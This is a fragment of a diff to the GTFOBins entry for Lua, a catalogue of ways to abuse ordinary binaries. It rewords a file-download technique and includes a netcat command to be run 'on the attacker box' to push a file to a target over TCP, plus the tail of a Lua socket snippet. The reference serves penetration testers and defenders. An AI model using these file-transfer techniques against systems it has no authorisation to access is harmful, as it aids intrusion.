GTFOBins/GTFOBins.github.io/_gtfobins/lua.md

           t:send(d);
           t:close();'
   file-download:
-    - description: Fetch remote file sent to a local TCP port.
+    - description: Fetch a remote file via TCP.
 Run `nc target.com 12345
         < "file_to_send"` on the attacker box to send the file.
 This requires `lua-socket` installed.
       code: |
         export LPORT=12345